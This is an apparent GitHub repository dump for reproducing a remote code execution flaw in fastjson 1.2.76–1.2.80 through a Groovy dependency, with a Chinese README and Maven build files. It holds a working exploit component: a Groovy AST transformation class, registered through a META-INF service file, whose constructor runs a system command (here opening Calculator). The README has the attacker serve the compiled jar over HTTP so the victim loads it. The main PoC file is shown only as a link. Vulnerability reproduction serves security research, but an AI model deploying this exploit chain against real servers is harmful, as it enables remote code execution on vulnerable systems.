├── .gitignore
├── README.md
├── attack
    ├── pom.xml
    └── src
    │   └── main
    │       ├── java
    │           └── groovy
    │           │   └── grape
    │           │       └── GrabAnnotationTransformation2.java
    │       └── resources
    │           └── META-INF
    │               └── services
    │                   └── org.codehaus.groovy.transform.ASTTransformation
├── images
    └── 1662101876011-b08585ac-f575-4c11-bb7d-2d09f1296cd1.png
├── pom.xml
└── src
    └── main
        └── java
            └── Poc.java


/.gitignore:
--------------------------------------------------------------------------------
 1 | # Ant
 2 | local.properties
 3 | 
 4 | # Maven
 5 | target/
 6 | release.properties
 7 | 
 8 | # IntelliJ
 9 | *.iml
10 | *.ipr
11 | *.iws
12 | .idea/
13 | out/
14 | 
15 | # Mac
16 | .DS_Store
17 | 
18 | ### Java template
19 | # Compiled class file
20 | *.class
21 | 
22 | # Log file
23 | *.log
24 | 
25 | # BlueJ files
26 | *.ctxt
27 | 
28 | # Mobile Tools for Java (J2ME)
29 | .mtj.tmp/
30 | 
31 | # Package Files #
32 | *.jar
33 | *.war
34 | *.nar
35 | *.ear
36 | *.zip
37 | *.tar.gz
38 | *.rar


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # fastjson <= 1.2.80 RCE 漏洞复现
 2 | 
 3 | ##利用条件
 4 | - fastjson版本： 1.2.76 <= fastjson < 1.2.83
 5 | - 存在groovy依赖
 6 | 
 7 | ##复现步骤
 8 | 1.编译attack 模块为 attack-1.jar包
 9 | 
10 | 2.在attack-1.jar包所在的目录下执行启用http服务。
11 | 
12 | `python -m SimpleHTTPServer 8433`
13 | 
14 | 3.运行poc
15 | 
16 | ![image](images/1662101876011-b08585ac-f575-4c11-bb7d-2d09f1296cd1.png)
17 | 


--------------------------------------------------------------------------------
/attack/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project xmlns="http://maven.apache.org/POM/4.0.0"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 | <!--    <parent>-->
 6 | <!--        <artifactId>fastjsonVul</artifactId>-->
 7 | <!--        <groupId>org.example</groupId>-->
 8 | <!--        <version>1.0-SNAPSHOT</version>-->
 9 | <!--    </parent>-->
10 |     <modelVersion>4.0.0</modelVersion>
11 |     <groupId>groovy</groupId>
12 |     <artifactId>attack</artifactId>
13 |     <version>1</version>
14 |     <dependencies>
15 |         <dependency>
16 |             <groupId>org.codehaus.groovy</groupId>
17 |             <artifactId>groovy-all</artifactId>
18 |             <version>3.0.1</version>
19 |             <scope>provided</scope>
20 |             <type>pom</type>
21 |         </dependency>
22 |     </dependencies>
23 | 
24 |     <properties>
25 |         <maven.compiler.source>8</maven.compiler.source>
26 |         <maven.compiler.target>8</maven.compiler.target>
27 |     </properties>
28 | 
29 | </project>


--------------------------------------------------------------------------------
/attack/src/main/java/groovy/grape/GrabAnnotationTransformation2.java:
--------------------------------------------------------------------------------
 1 | package groovy.grape;
 2 | 
 3 | import org.codehaus.groovy.ast.ASTNode;
 4 | import org.codehaus.groovy.control.CompilePhase;
 5 | import org.codehaus.groovy.control.SourceUnit;
 6 | import org.codehaus.groovy.transform.ASTTransformation;
 7 | import org.codehaus.groovy.transform.GroovyASTTransformation;
 8 | 
 9 | import java.io.IOException;
10 | 
11 | @GroovyASTTransformation(phase= CompilePhase.CONVERSION)
12 | public class GrabAnnotationTransformation2 implements ASTTransformation {
13 | 
14 |     public GrabAnnotationTransformation2() {
15 |         try {
16 |             Runtime.getRuntime().exec("open /System/Applications/Calculator.app");
17 |         } catch (IOException e) {
18 |         }
19 |     }
20 | 
21 |     @Override
22 |     public void visit(ASTNode[] nodes, SourceUnit source) {
23 | 
24 |     }
25 | }
26 | 


--------------------------------------------------------------------------------
/attack/src/main/resources/META-INF/services/org.codehaus.groovy.transform.ASTTransformation:
--------------------------------------------------------------------------------
1 | groovy.grape.GrabAnnotationTransformation2


--------------------------------------------------------------------------------
/images/1662101876011-b08585ac-f575-4c11-bb7d-2d09f1296cd1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Lonely-night/fastjsonVul/789654e95e11bbf52f29a08a471b36041787a038/images/1662101876011-b08585ac-f575-4c11-bb7d-2d09f1296cd1.png


--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project xmlns="http://maven.apache.org/POM/4.0.0"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |     <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |     <groupId>org.example</groupId>
 8 |     <artifactId>fastjsonVul</artifactId>
 9 |     <packaging>pom</packaging>
10 |     <version>1.0-SNAPSHOT</version>
11 |     <modules>
12 |         <module>attack</module>
13 |     </modules>
14 | 
15 |     <dependencies>
16 |         <dependency>
17 |             <groupId>com.alibaba</groupId>
18 |             <artifactId>fastjson</artifactId>
19 |             <version>1.2.80</version>
20 |         </dependency>
21 |         <!-- https://mvnrepository.com/artifact/org.codehaus.groovy/groovy-all -->
22 |         <dependency>
23 |             <groupId>org.codehaus.groovy</groupId>
24 |             <artifactId>groovy-all</artifactId>
25 |             <version>3.0.1</version>
26 |             <type>pom</type>
27 |         </dependency>
28 |     </dependencies>
29 |     <properties>
30 |         <maven.compiler.source>8</maven.compiler.source>
31 |         <maven.compiler.target>8</maven.compiler.target>
32 |     </properties>
33 | 
34 | </project>


--------------------------------------------------------------------------------
/src/main/java/Poc.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Lonely-night/fastjsonVul/789654e95e11bbf52f29a08a471b36041787a038/src/main/java/Poc.java


--------------------------------------------------------------------------------